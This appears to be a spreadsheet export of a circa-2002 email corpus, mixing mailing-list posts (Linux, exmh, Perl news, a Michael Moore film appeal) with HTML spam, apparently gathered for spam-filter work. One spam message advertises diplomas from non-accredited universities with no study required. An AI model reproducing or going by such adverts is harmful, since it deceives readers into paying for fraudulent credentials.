 &gt;&gt; kiss the film good-bye. Therefore, this weekend, this film must be 
 &gt;&gt; seen by
 &gt;&gt; millions of Americans. Can you help me make that happen?
 &gt;&gt;
 &gt;&gt; "Bowling for Columbine" is not a film simply about guns or school
 &gt;&gt; shootings.
 &gt;&gt; That is only the starting point for my 2-hour journey into the dark 
 &gt;&gt; soul of
 &gt;&gt; a country that is both victim and master of an enormous amount of 
 &gt;&gt; violence,
 &gt;&gt; both at home and around the world. With this movie I have broadened my
 &gt;&gt; canvas to paint a portrait of our nation at the beginning of the 21st
 &gt;&gt; century, a nation that seems hell-bent on killing first and asking
 &gt;&gt; questions
 &gt;&gt; later. It is a movie about the state sponsored acts of violence and
 &gt;&gt; terrorism against our own poor, and how we have created a culture of 
 &gt;&gt; fear
 &gt;&gt; that is based on the racial dilemma we continue to ignore. And it's a
 &gt;&gt; devastating comedy.
 &gt;&gt;
 &gt;&gt; This film is going to upset some pretty big apple carts. No film has 
 &gt;&gt; EVER
 &gt;&gt; said the things I am saying in "Bowling for Columbine." I expect to be
 &gt;&gt; attacked. I expect certain theatres will not show it for fear of
 &gt;&gt; retribution. I expect that this movie will be a bitter pill for many 
 &gt;&gt; to
 &gt;&gt; swallow.
 &gt;&gt;
 &gt;&gt; This is why I need your help. Movies live or die based on what 
 &gt;&gt; happens at
 &gt;&gt; the box office the first weekend of its release. I need you, if you 
 &gt;&gt; live in
 &gt;&gt; the New York or L.A. area, to go see "Bowling for Columbine" this 
 &gt;&gt; Friday
 &gt;&gt; and
 &gt;&gt; Saturday -- and take as many family members and friends with you as
 &gt;&gt; possible. I guarantee you will not be disappointed -- and you may 
 &gt;&gt; just see
 &gt;&gt; one of the best films of the year.
 &gt;&gt;
 &gt;&gt; Monday night in Times Square, "Bowling for Columbine" had its 
 &gt;&gt; premiere. The
 &gt;&gt; crowd was amazing, as it was this past Saturday night at the Chicago 
 &gt;&gt; Film
 &gt;&gt; Festival. The audience kept laughing or hooting or applauding so loud
 &gt;&gt; throughout the film that it was hard to hear the next line.
 &gt;&gt;
 &gt;&gt; The hate mail, the threats, the promises of retribution have already
 &gt;&gt; started
 &gt;&gt; to roll in to the distributor of this movie, United Artists. They are 
 &gt;&gt; not
 &gt;&gt; backing down. But how long will this last? I need all of you in the 
 &gt;&gt; New
 &gt;&gt; York
 &gt;&gt; tri-state and southern California areas to go see "Bowling for 
 &gt;&gt; Columbine"
 &gt;&gt; THIS weekend -- the rest of you can see it in a couple of weeks when 
 &gt;&gt; it
 &gt;&gt; comes to your town. A strong opening not only means that the rest of
 &gt;&gt; America
 &gt;&gt; will see this film, it means that a good number of people who see it 
 &gt;&gt; are
 &gt;&gt; going to leave the film angry enough to get active and get involved. 
 &gt;&gt; If it
 &gt;&gt; does poorly, I will have a difficult time finding the funding for the 
 &gt;&gt; movie
 &gt;&gt; I want to make next -- a film about 9/11 and how Bush is using that 
 &gt;&gt; tragic
 &gt;&gt; day as a cover for his right-wing agenda.
 &gt;&gt;
 &gt;&gt; Don't let that happen. Don't let the NRA have one more success by 
 &gt;&gt; stopping
 &gt;&gt; the wider distribution of this movie. And, together, let us not remain
 &gt;&gt; silent in our opposition to Bush's phony war against Iraq.
 &gt;&gt;
 &gt;&gt; If you live in New York, you can see it at the Lincoln Plaza, the 
 &gt;&gt; Sunshine
 &gt;&gt; and the Loews 19th St. In L.A., you can catch it at the Sunset 5, the
 &gt;&gt; Westwood Regent, Laemmle Sunset, Laemmle Towncenter (Encino), Landmark
 &gt;&gt; Rialto (Pasadena), and Regal University (Irvine). Also, please 
 &gt;&gt; forward this
 &gt;&gt; to your other friends and tell them to go see "Bowling for Columbine" 
 &gt;&gt; this
 &gt;&gt; weekend.
 &gt;&gt;
 &gt;&gt; And finally, don't miss our new website www.bowlingforcolumbine.com
 &gt;&gt;
 &gt;&gt; Thank you for your help with this. I feel so honored and privileged 
 &gt;&gt; to have
 &gt;&gt; so many people interested in my work. Last January I was getting 
 &gt;&gt; 70,000
 &gt;&gt; hits
 &gt;&gt; a month on my website. Last month, I got 17 million hits. This alone 
 &gt;&gt; speaks
 &gt;&gt; volumes about the vast majority all of us belong to who are sick and 
 &gt;&gt; tired
 &gt;&gt; of what is going on and are longing for an alternative source of
 &gt;&gt; information.
 &gt;&gt;
 &gt;&gt; I hope that you enjoy "Bowling for Columbine."
 &gt;&gt;
 &gt;&gt; Thank you again...
 &gt;&gt;
 &gt;&gt; Yours,
 &gt;&gt;
 &gt;&gt; Michael Moore
 &gt;&gt;
 &gt;&gt; ---
 &gt;&gt;
 &gt;&gt; If you wish to be be unsubscribed from this mailing list, please 
 &gt;&gt; click the
 &gt;&gt; link below and follow the instructions.
 &gt;&gt;
 &gt;&gt; http://www.michaelmoore.com/mailing/unsubscribe.php
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Since we were on the subject...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Gays, gay sex, gay marriage.....wooohooo its been a mano e mano week and
 thursady will be the mass market consumer period on it.
 The WWE's gay marriage cermemony is in the can, that is its been filmed
 last night for thursady nights Smackdown. Did they do it tastefully? Oh
 come on its the WWE for cripssake, of course they didnt. Did they use it
 ot promote an story line? Despite the WWE throwing away more good story
 lines in the last 2 years than a wood chuck who could chuck wood if the
 enviromentalists did not slap lawsuits on them, the sotrywrites seemed to
 have finaly hit on a big tie togther event for several story lines.
 But of course, no one here watches the WWE, and not even because you would
 rather watch old Divxs of the ECW, so this little bit is probably fallign
 on the old killsawfiles.
 SO I wont be bursting anyones thursdaynight plans if I smarkout and say
 that B and C waver near the final vows, the blame is falling on Ricco,
 thier "manager"*, for  pushing them to carry out their "gay" act far too
 long and just when things look to be heating up with that story
 arc......the mask comes off the justice of the piece as he pronounces
 that they have gone 3  minutes, yes 3 minutes, too long.....Yep, its the
 Bisch and in come Rosey  and Jamal to attempt a stomping on Stpehnie
 McMahon. Hopefully they did  not get off a kick like they did on the first
 lesbain back on Mondays raw as that broke a rib.
 Of course the editing truck boys might change some none or all of this
 around, so if thursday nights tape play reveals them hitch and on thier
 way to a honeymoon, thats the luck o the smarkies. I doubt it will be
 edited much though from the way I heard it.
 So the bottomline is, they really were not gay all along, they were play
 acting and it got out of hand because Ricco made them, Steaphnie gets a
 face push while the Bisch gets a thursady night special 3 min heel push,
 thus furthing the story arc of the brand split. Rosey and Jamala  get heat
 and B and C get a new Tag Team to play with.  Ricco..who knows, maybe some
 heat time would be good for him as a single.
 All this of course at a time when the ratting are in the bottom of a 4
 year valley of gloom, the last 2 years have been mostly squandered on
 borken story arc promises and bad acting, and to top it all off Mick is no
 longer ont he sceen so...bang bang...how can it be all good?
 Well, its back to my growing ECW divx collection where Tajiri was the shiz
 and Mick cut promos unrivaled by any of todays mic monkeys.
 * Todays managers are a far cry form the managers of the 80's/early 90's.
 Ricco is nota  Paul Bearer or a Jimmy Heart at all but more like a buddy
 who goes to the ring with them and occasional interferes..ugh.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Delete your Bad Credit Online!                   1471
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Education Opportunity we spoke about                        GF
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;
 A.yellow:link {text-decoration: none; color: #FFF200}
 A.yellow:visited {text-decoration: none; color: #FFF200}
 A.yellow:active {text-decoration: none; color: #EFEFC8}
 A.yellow:hover {text-decoration: none; color: #FFFFFF}
 &lt;/style&gt;
 &lt;body topmargin=3D"0" bgcolor=3D"#FFFFFF"&gt;
 &lt;div align=3D"center"&gt;&lt;br&gt;
   &lt;table width=3D"650" border=3D"1" cellspacing=3D"0" cellpadding=3D"2" bo=
 rdercolor=3D"#000000"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"650" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "4" align=3D"center"&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"003366"&gt;&lt;font size=3D"2" color=3D"#FFFFFF" face=
 =3D"Arial, Helvetica, sans-serif"&gt;. 
               U N I V E R S I T Y . D I P L O M A S .&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"000000" height=3D"40" valign=3D"middle"&gt; 
               &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"2" color=3D"#FFFFFF"&gt;&lt;i&gt;Do 
                 you want for a prosperous future, increased money earning =
 power, 
                 and the respect of all?&lt;/i&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"CC0033"&gt; 
               &lt;div align=3D"center"&gt; 
                 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-ser=
 if" size=3D"2"&gt;We 
                   can assist with Diplomas from prestigious non-accredited=
  universities 
                   based on your present knowledge and life experience.&lt;/fo=
 nt&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td background=3D"images/bg.jpg"&gt; 
               &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"3"&gt;&lt;br&gt;
                 &lt;b&gt;&lt;font color=3D"#FF0000"&gt;No required tests, classes, boo=
 ks, or 
                 interviews.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; &lt;/div&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica,=
  sans-serif" size=3D"3"&gt;&lt;i&gt;Bachelors, 
                 masters, MBA, and doctorate (PhD) diplomas available in th=
 e field 
                 of your choice - that's right, you can become a Doctor, La=
 wyer or Accountant and receive 
                 all the benefits and admiration that comes with it!&lt;/i&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica,=
  sans-serif" size=3D"3"&gt;&lt;b&gt;&lt;font size=3D"5" color=3D"#0000FF"&gt;No 
                 one is turned down!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica,=
  sans-serif" size=3D"3"&gt;&lt;i&gt;Confidentiality 
                 assured - Change your Life Today!&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
                 &lt;br&gt;
               &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"000000"&gt; 
               &lt;div align=3D"center"&gt; 
                 &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;br&gt;
                   Either &lt;b&gt;&lt;a href=3D"http://61.129.81.72/jf/diploma/dipl=
 oma.htm" class=3D"yellow"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;a href=3D"http://61.129.81.72=
 /jf/diploma/diploma.htm"&gt; &lt;/a&gt;or 
                   you can call us 24 hours a day, 7 days a week! &lt;font siz=
 e=3D"1"&gt;(including 
                   Sundays and holidays):&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;1 - 310 - 388 - 6087&lt;/font&gt;&lt;/b&gt; &lt;/fo=
 nt&gt; &lt;font size=3D"5" face=3D"Arial, Helvetica, sans-serif" color=3D"#FFFFF=
 F"&gt;
                   &lt;br&gt;
                   &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"003366"&gt; 
               &lt;div align=3D"center"&gt;&lt;font size=3D"2" color=3D"#FFFFFF" fac=
 e=3D"Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a class=3D"yellow" href=3D"http://6=
 1.129.81.72/jf/diploma/diploma.htm"&gt;Contact 
                 us NOW&lt;/a&gt; to receive your diploma within days, and start =
 improving 
                 your life!&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table align=3D"center" width=3D"650" cellspacing=3D"2" cellpadding=3D"2" =
 border=3D"0" class=3D"footer2"&gt;
   &lt;tr&gt;&lt;td colspan=3D"2"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-seri=
 f" size=3D"1"&gt;&lt;br&gt;
  &lt;font color=3D"ED1C24"&gt;Did you receive an email advertisement in error?&lt;/=
 font&gt; Our goal is to only target individuals who would like to take advant=
 age of our offers. If you'd like to be removed from our mailing list, plea=
 se click on the link below. You will be removed immediately and automatica=
 lly from all of our future mailings.&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt; &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D=
 "1"&gt;We protect all email addresses from other third parties. Thank you.&lt;/f=
 ont&gt;&lt;/td&gt;
 &lt;td align=3D"right"&gt;&lt;a href=3D"http://61.129.81.72/remove/remove.htm"&gt;&lt;fon=
 t face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;Please remove =
 me.&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Optimising for PentiumMMX?
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been playing with an old Dell OptiPlex5110 and decided to attempt to 
 build a PentiumMMX optimised Linux on it.
 To start, I installed the bare minimum Debian system for  compiling programs.
 Next I built a custom kernel, since most CPU optimizations are best suited to 
 the kernel code.
 Next I built X4.2.0 from sources, especially since X make a lot of use of 
 matrixes and can also benifit from MMX optimizations. Since the first build, 
 I've been encouraged to play with the CVS of both XFree86 and the DRI stuff, 
 so I will be re-building X once we get some bugs worked out.
 Finally I built KDE3.0BETA1 from sources I had, again to take full advantage 
 of the MMX processor.
 Can anyone recommend other minimum tools that I should re-build to get even 
 more improvements in system performance? I know that not all packages can, or 
 do benefit from being built on PentiumMMX rather than the i386 that Debian 
 compiles to, but have I covered everything that CAN benefit?
 I am wondering if the C, and other libraries  should be re-built? Can they 
 take advantage of the Pentium and MMX instructions for system performance? 
 And would this require re-building gcc as well?
 I realise that not everything can benefit from re-compiling. I.E. I doubt I 
 would see much system improvement if I re-compile bash, but things like the 
 kernel, X and KDE should improve performance.
 On a related note, I know I've mentioned here before, but I'm still looking 
 for a Slot 1 550Mhz PIII. My regular system is a Dual PII350 and the 440BX 
 M/B can take PIII's. I managed to get my hands on one. If I could get another 
 I could put the two PIII's into this box and re-compile X to use the 
 SSE/Katmai instructions in the PIII. I just don't thing it is worth replacing 
 two PII's with one PIII. I know that they are out-of-stock, and I do watch 
 the Buy-N-Sell regularly, but short of buying a full PIII system, I've not 
 had much luck.
 Cheers,
 	John Gay
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Publishing Tools - Free Software Alert!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;center&gt;
 &lt;table width="582" border="2" cellspacing="0" cellpadding="5" bordercolor="#0077CC"&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt;&lt;!5122qHWL1-032pyeM4045IIgM3-001oYhw0942jQSK5-726UDqG9283lEHR8-145EiGhl64&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt;Publish Like a Professional with Digital Publishing Tools&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="1" width="204" valign="top"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Easily Create Professional:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;eBooks&lt;/li&gt;
 &lt;li&gt;eBrochures&lt;/li&gt;
 &lt;li&gt;eCatalogs&lt;/li&gt;
 &lt;li&gt;Resumes&lt;/li&gt;
 &lt;li&gt;Newsletters&lt;/li&gt;
 &lt;li&gt;Presentations&lt;/li&gt;
 &lt;li&gt;Magazines&lt;/li&gt;
 &lt;li&gt;Photo Albums&lt;/li&gt;
 &lt;li&gt;Invitations&lt;/li&gt;
 &lt;li&gt;Much, much more&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="264" valign="top" align="center"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Save MONEY! - Save Trees&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;
 Save on Printing, Postage and Advertising Costs&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000099" size="5"&gt;DIGITAL PUBLISHING TOOLS&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="3"&gt;DOWNLOAD NEW FREE Version NOW!&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;*Limited Time Offer&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width="204" valign="top"&gt;&lt;b&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" size="2" color="#000066"&gt;Choose from these&lt;br&gt;
 Display Styles:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;3D Page Turn&lt;/li&gt;
 &lt;li&gt;Slide Show&lt;/li&gt;
 &lt;li&gt;Sweep/Wipe&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;Embed hyperlinks and Link to anywhere Online, 
 such as your Website, Order Page or Contact Form.
 &lt;br&gt;
 &lt;br&gt;
 Distribute via Floppy, CD-ROM, E-Mail or Online.
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt; 
 &lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;
 Take your Marketing to the Next Level!&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2" width="384"&gt; 
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 For &lt;b&gt;More Info&lt;/b&gt;, &lt;b&gt;Samples&lt;/b&gt; or a &lt;b&gt;FREE Download&lt;/b&gt;, click the appropriate link to the right! &amp;nbsp;
 Server demand is extremely high for this limited time &lt;b&gt;Free Software&lt;/b&gt; offer. &amp;nbsp;
 &lt;b&gt;Please try these links periodically if a site seems slow or unreachable.&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="204" align="center"&gt; 
 &lt;b&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href="http://3dpageturningebook.com"&gt;WEBSITE 1&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://TheyGo.com/FreeSoftware"&gt;WEBSITE 2&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.digitalpublishingtools.com"&gt;WEBSITE 3&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center"&gt;
 &lt;form action="http://www.3dpageturningebook.com/unsubscribe.asp" method="post"&gt;
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 If you wish to be removed from our mailing list, please cick the Unsubscribe button
 &lt;/font&gt;
 &lt;br&gt;
 &lt;input size="25" name="e" value="zzzz@example.com
 "&gt; &amp;nbsp;&lt;input type="submit" value="Unsubscribe"&gt;
 &lt;input type="hidden" name="c" value="unsub"&gt;
 &lt;/form&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color=#000066 size=1&gt;Copyright  2002 - Affiliate ID #1269&lt;br&gt;
 *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Fri, 13 Sep 2002 11:26:30 +1000
     From:        Tony Nugent &lt;tony@linuxworks.com.au&gt;
     Message-ID:  &lt;200209130126.g8D1QUf21470@hobbit.linuxworks.com.au.nospam&gt;
   | I can cut'n'paste from exmh's message display window into spawned
   | gvim processes, but not into anything else.
 That's odd.  I cut &amp; paste between all kinds of windows (exmh into
 mozilla, xterm, another wish script of mine I use for DNS tasks (but
 that one I guess is to be expected) netscape (when I used to use it,
 but I suppose it and mozilla are the same codebase, approx) - in fact
 I can't thing of anything it fails for, that I have noticed.
 What is an example of an "anything else" that it fails for for you?
 kre
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-20
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Call for Perl Monger T-Shirts at YAPC::Europe
     * This Week on perl5-porters (11-18 August 2002)
 +--------------------------------------------------------------------+
 | Call for Perl Monger T-Shirts at YAPC::Europe                      |
 |   posted by ziggy on Monday August 19, @08:53 (yapce)              |
 |   http://use.perl.org/article.pl?sid=02/08/19/1254219              |
 +--------------------------------------------------------------------+
 [0]neophyte writes "If you come to YAPC::Europe 2002, and you are a
 member of a Perlmonger group, and your group has its own t-shirts, then
 please bring one to YAPC::Europe for the auction. Show off the creativity
 of your group and give someone else the chance to have such a nice
 t-shirt as yours."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/19/1254219
 Links:
     0. mailto:niederrhein-pm@web.de
 +--------------------------------------------------------------------+
 | This Week on perl5-porters (11-18 August 2002)                     |
 |   posted by pudge on Monday August 19, @10:12 (summaries)          |
 |   http://use.perl.org/article.pl?sid=02/08/19/1230217              |
 +--------------------------------------------------------------------+
 &gt;&gt;From sunny and hot and about to burst out in thunderstorms, downtown
 Echt, comes this weeks perl5-porters summary, brought to you by Elizabeth
 Mattijsen.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/08/19/1230217
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/19/1230217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</si>
  <si>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At 08:18 AM 9/28/02 -0700, Gregory Alan Bolcer wrote:
 &gt;IE6 and Netscape 6,7 have pre-forms sutff,
 &gt;but I always turn it off because you never know when there's that one field
 &gt;that you don't want to submit to the person you are submitting to that
 &gt;automatically gets sent, i.e. the privacy stuff is well beyond the
 &gt;average user who will get screwed on privacy stuff.
 Opera 6 has an interesting way around this. You just right-click on each 
 field and bring up a choice of prefilled local information that you can 
 then choose to enter into the form.
 Now if they can just fix the $@!$@$# irritating memory problems that Opera6 
 has....Hakon, you listening?
 Udhay
 -- 
 ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'Seminal' eczema study reveals skin's broken defences
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8719499,1440/
 Date: Not supplied
 Sufferers fail to produce effective amounts of key bacteria-killing molecules - 
 the discovery raises hopes of new treatments for millions
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Take Control Of Your Conference Calls&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DTimes, New Roman&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#000066 size=3D6&gt;Crystal Clear  
       Conference Calls&lt;BR&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#666600 size=3D5&gt;&lt;B&gt;(Anytime/Anywhere)&lt;/B&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#000066 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;International Dial In 18 cents per minute
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#666600 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;G=
 et the best 
       quality, the easiest to use, and lowest rate in the 
       industry.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000066 size=3D4&gt;If you like saving m=
 oney, fill 
       out the form below and one of our consultants will contact 
   you.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#000066 size=3D2&gt;Required Input Field&lt;FONT color=3D#66660=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks2_4@yahoo.com?subject=3DConference_Inqu=
 iry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
